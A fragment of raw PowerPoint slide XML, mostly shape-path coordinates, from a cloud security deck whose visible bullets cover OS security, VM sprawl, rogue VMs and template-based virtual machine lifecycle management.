                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666761" y="1651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715772" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5444235" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5493246" y="1651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5541370" y="6533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5588500" y="14540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5634530" y="25565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5679354" y="39501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5722864" y="56243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5764954" y="75683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5805518" y="97714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5844448" y="122231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5881640" y="149127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5916985" y="178295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5950378" y="209629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5981712" y="243022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6010880" y="278367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6037776" y="315559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6062293" y="354489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6084324" y="395053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6103764" y="437143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120506" y="480653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6134442" y="525477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6145467" y="571507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6153474" y="618637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158356" y="666761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="715772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="3578859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158356" y="3627870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6153474" y="3675994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6145467" y="3723124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6134442" y="3769154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120506" y="3813978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6103764" y="3857488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6084324" y="3899578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6062293" y="3940142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6037776" y="3979072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6010880" y="4016264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5981712" y="4051609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5950378" y="4085002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5916985" y="4116336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5881640" y="4145504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5844448" y="4172400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5805518" y="4196917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5764954" y="4218948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5722864" y="4238388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5679354" y="4255130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5634530" y="4269066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5588500" y="4280091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5541370" y="4288098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5493246" y="4292980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5444235" y="4294632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715772" y="4294632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666761" y="4292980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618637" y="4288098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571507" y="4280091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525477" y="4269066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="480653" y="4255130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437143" y="4238388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395053" y="4218948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354489" y="4196917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315559" y="4172400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278367" y="4145504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243022" y="4116336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209629" y="4085002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178295" y="4051609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149127" y="4016264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122231" y="3979072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97714" y="3940142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75683" y="3899578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56243" y="3857488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39501" y="3813978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25565" y="3769154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14540" y="3723124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6533" y="3675994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651" y="3627870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3578859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="715772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19758" y="5630672"/>
            <a:ext cx="37363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0" indent="-368935">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="381000" algn="l"/>
                <a:tab pos="381635" algn="l"/>
              </a:tabLst>
            </a:pP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Maintain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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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environment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30551" y="3035807"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246372" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164084" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372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163061" y="3332226"/>
            <a:ext cx="234315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15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es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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Sec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rity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888730" y="3492246"/>
            <a:ext cx="6160135" cy="4290060"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6160134" h="4290059">
                <a:moveTo>
                  <a:pt x="0" y="715009"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1649" y="666061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6528" y="617997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14528" y="570923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25544" y="524948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39468" y="480176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56195" y="436715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75618" y="394671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97630" y="354151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122124" y="315261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148995" y="278108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178135" y="242798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209438" y="209438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242798" y="178135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278108" y="148995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315261" y="122124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354151" y="97630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394671" y="75618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436715" y="56195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="480176" y="39468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524948" y="25544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="570923" y="14528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="617997" y="6528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666061" y="1649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715010" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5444998" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5493946" y="1649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5542010" y="6528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5589084" y="14528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5635059" y="25544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5679831" y="39468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5723292" y="56195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5765336" y="75618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5805856" y="97630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5844746" y="122124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5881899" y="148995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5917209" y="178135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5950569" y="209438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5981872" y="242798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6011012" y="278108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6037883" y="315261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6062377" y="354151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6084389" y="394671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6103812" y="436715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120539" y="480176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6134463" y="524948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6145479" y="570923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6153479" y="617997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158358" y="666061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="715009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="3575050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158358" y="3623998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6153479" y="3672062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6145479" y="3719136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6134463" y="3765111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120539" y="3809883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6103812" y="3853344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6084389" y="3895388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6062377" y="3935908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6037883" y="3974798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6011012" y="4011951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5981872" y="4047261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5950569" y="4080621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5917209" y="4111924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5881899" y="4141064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5844746" y="4167935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5805856" y="4192429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5765336" y="4214441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5723292" y="4233864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5679831" y="4250591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5635059" y="4264515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5589084" y="4275531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5542010" y="4283531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5493946" y="4288410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5444998" y="4290059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715010" y="4290059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666061" y="4288410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="617997" y="4283531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="570923" y="4275531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524948" y="4264515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="480176" y="4250591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436715" y="4233864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394671" y="4214441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354151" y="4192429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315261" y="4167935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278108" y="4141064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242798" y="4111924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209438" y="4080621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178135" y="4047261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148995" y="4011951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122124" y="3974798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97630" y="3935908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75618" y="3895388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56195" y="3853344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39468" y="3809883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25544" y="3765111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14528" y="3719136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6528" y="3672062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1649" y="3623998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3575050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="715009"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="EE63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264777" y="4821072"/>
            <a:ext cx="5350510" cy="19373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0" marR="438150" indent="-368935">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="381000" algn="l"/>
                <a:tab pos="381635" algn="l"/>
              </a:tabLst>
            </a:pP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System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sprawl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undocumented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assets</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-368935">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="381000" algn="l"/>
                <a:tab pos="381635" algn="l"/>
              </a:tabLst>
            </a:pP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Virtual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machine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lifecycle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management</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="381000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
            </a:pP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(VMLM)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-368935">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="381000" algn="l"/>
                <a:tab pos="381635" algn="l"/>
              </a:tabLst>
            </a:pP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Use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template-based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VM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creation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797795" y="2970276"/>
            <a:ext cx="4411980" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4411980" h="984885">
                <a:moveTo>
                  <a:pt x="4247896" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896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1269218" y="3266948"/>
            <a:ext cx="147066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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Rogu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35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dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ms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38147" y="2108073"/>
            <a:ext cx="138328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Virtual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Machine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Lifecycle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Management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(VMLM)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software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deployed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enforce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VM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sprawl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avoidance.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70270" y="4258436"/>
            <a:ext cx="431863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5"/>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75"/>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114"/>
              <a:t>Solutions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06544" y="306451"/>
            <a:ext cx="704405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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Auditing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3260" y="760476"/>
            <a:ext cx="9899904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290570" y="3344671"/>
            <a:ext cx="2388235" cy="4552315"/>
            <a:chOff x="3290570" y="3344671"/>
            <a:chExt cx="2388235" cy="4552315"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3290570" y="3344671"/>
              <a:ext cx="2290445" cy="4552315"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="72135" y="4408932"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44529" y="4415256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22256" y="4431141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7556" y="4454241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2666" y="4482211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8991" y="4509825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24876" y="4532114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47976" y="4546828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75945" y="4551718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103552" y="4545382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125825" y="4529485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140525" y="4506374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73659" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139090" y="4450794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123205" y="4428521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100105" y="4413821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72135" y="4408932"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73659" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145414" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
